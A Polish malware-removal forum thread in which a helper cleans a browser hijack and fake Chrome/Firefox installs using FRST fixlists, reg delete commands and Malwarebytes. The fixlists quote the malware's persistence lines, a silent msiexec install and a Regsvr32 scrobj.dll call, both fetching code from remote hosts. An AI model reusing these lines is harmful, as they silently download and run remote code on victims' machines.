Skocz do zawartości

pobranie zablokowane hxxp://d2xvc2nqkduarq.cloudfront.net/zr/js/ncbs


Rekomendowane odpowiedzi

Dzień dobry,

W trakcie korzystania z przeglądarki chrom (konkretnie ze strony xxx.fera.pl) przeglądarka została zamknięta a program kaspersky wyświetlił komunikaty o blokowaniu stron. Po ponownym uruchomieniu przeglądarki jako strona startowa pojawiła się xxx.funnysearching.com. Od tego momentu kaspersky pokazuje komunikaty o blokowaniu hxxp://d2xvc2nqkduarq.cloudfront.net/zr/js/ncbs.

Zauważyłam również na pulpicie ikonę mozilli firefox, z której nie korzystam i nie pamiętam abym ją instalowała (na liście w "odinstaluj program" nie ma mozilli).

Nie wiem czy może to mieć jakiś związek z powyższym problemem ale od ok. miesiąca, sporadycznie, po uruchomieniu komputera działa przeglądarka chrom ale nie działa menadżer plików, albo odwrotnie. Zdarza się to rzadko i po zrestartowaniu komputera problem ustępuje.

 

Załączam wymagane logi (plus skanowanie kasperkym).

 

Będę bardzo wdzięczna za pomoc.

Pozdrawiam

Monika

Addition.txt

FRST.txt

gmer.txt

kaspersky.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Samoinstalująca się przeglądarka FireFox to fałszywka przeglądarki Mozilla FireFox. Do tego przeglądarka Google Chrome również została sfałszowana (ale poprzez dodanie niepoprawnej ścieżki do uruchamiania złej wersji, poprawna występuje również). Przechodzimy do akcji.

 

Do poczytania, obowiązkowo: KLIK.

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /q
IFEO\taskmgr.exe: [Debugger] 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Doeye
RemoveDirectory: C:\Users\monic\AppData\Local\Doeye
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () 
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\monic\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\monic\AppData\Local\Firefox
RemoveDirectory: C:\Users\monic\AppData\LocalLow\Mozilla
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) 
Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dll
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe
FirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
C:\Users\monic\Desktop\GIMP 2.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
  • Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 
3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

doeye;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 

 

5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Edytowane przez Miszel03
Odnośnik do komentarza

Nic się nie wykonało, przetwórz skrypt jeszcze raz, ale tym razem taki (ucięte problematyczne wejście). 

 

CloseProcesses:
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== /q
IFEO\taskmgr.exe: [Debugger] 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Doeye
RemoveDirectory: C:\Users\monic\AppData\Local\Doeye
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\monic\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\monic\AppData\Local\Firefox RemoveDirectory: C:\Users\monic\AppData\LocalLow\Mozilla
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
HKU\S-1-5-21-371738369-586191522-401486134-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Task: {C5EE9E09-5CBF-4EE4-93F9-8B35118FB45D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8dNkY2OTw1MTMcNjZLFjqdMTLSNWY4NdU8RWw4FkUcFc== scrobj.dll
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\monic\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{2CDFE13B-4291-4ECE-9150-EE5582884422}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe
FirewallRules: [{21F23E99-1CBA-44A9-AF05-F78F7A3D6E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{396E9080-41DF-42AF-A767-59D0DD3E1217}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
C:\Users\monic\Desktop\GIMP 2.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
EmptyTemp:

Odnośnik do komentarza

Wszystko pomyślnie wykonane.

Do kasacji zostały szczątkowe klucze od fałszywych przeglądarek. Przeprowadzimy końcowy skan, podsumujemy wyniki i będziemy kończyć. 

 

1. Start narzędzia komend.

  • Kliknij jednocześnie klawisz winkey.png oraz R. Uruchomi się narzędzie Uruchamianie.
  • W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER.
  • Uruchomi się okno konsoli komend. 
2. Użycie odpowiednich komend.
  • W oknie konsoli komend wklej poniższą komendę. 
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye" /f

reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Doeye" /f

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox" /f

reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Firefox" /f

  • Rozpocznie się kasacji kluczy, czekaj, a gdy proces dobiegnie końca uruchom ponownie system.
3. Skasuj ręcznie ten plik przez SHIFT + Delete (omijanie kosza) C:\Users\monic\AppData\Roaming\Mozilla.

 

4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

 

5. Podsumuj obecny stan systemu.

Odnośnik do komentarza
Chyba nie usunęło mi się wszystko... poniżej co mi wyskoczyło:

 

C:\Users\monic>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye" /f

ERROR: Odmowa dostępu.

 

C:\Users\monic>reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Doeye" /f

Operacja ukończona pomyślnie.

 

C:\Users\monic>reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox" /f

ERROR: Odmowa dostępu.

 

C:\Users\monic>reg delete "HKEY_USERS\S-1-5-21-371738369-586191522-401486134-1001\SOFTWARE\Firefox" /f

Operacja ukończona pomyślnie.

Odnośnik do komentarza

Wszystkie zagrożenia wykryte przez MBAM daj do kasacji. 

Proszę znowu o podsumowanie obecnego stan systemu. 

Zagrożenia wykryte przez MBAM wykasowane.

System uruchamia się znacznie szybciej, zamyka również. Nie ma problemu, że nie działa chrom albo menadżer plików.

W kasperskim mam komunikat: "legalne oprogramowanie, które może zostać użyte w celu uszkodzenia Twojego komputera lub prywatnych danych. C:\Users\monic\AppData\Local\Doeye\User Data\Default\Cache\f_000198" - nie wiem z kiedy to jest.

Nie wiem czy ma to znaczenie ale na pulpicie ikona Dropbox nie ma znaczka tylko jest białą kartką.

Odnośnik do komentarza

Zagrożenia wykryte przez MBAM wykasowane.

 

OK.

 

System uruchamia się znacznie szybciej, zamyka również. Nie ma problemu, że nie działa chrom albo menadżer plików.

 

OK. 

 

W kasperskim mam komunikat: "legalne oprogramowanie, które może zostać użyte w celu uszkodzenia Twojego komputera lub prywatnych danych. C:\Users\monic\AppData\Local\Doeye\User Data\Default\Cache\f_000198" - nie wiem z kiedy to jest.

 

Tj. alert dot. wykrycia fałszywej przeglądarki, która została przeze już usunięte (= alert późniejszy). 

 

Nie wiem czy ma to znaczenie ale na pulpicie ikona Dropbox nie ma znaczka tylko jest białą kartką.

 

Taki program nie jest w ogóle zainstalowany - napraw bądź zainstaluj program na nowo. 

 


 

 

Myślę, że od strony tego działu możemy kończyć. 

 

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...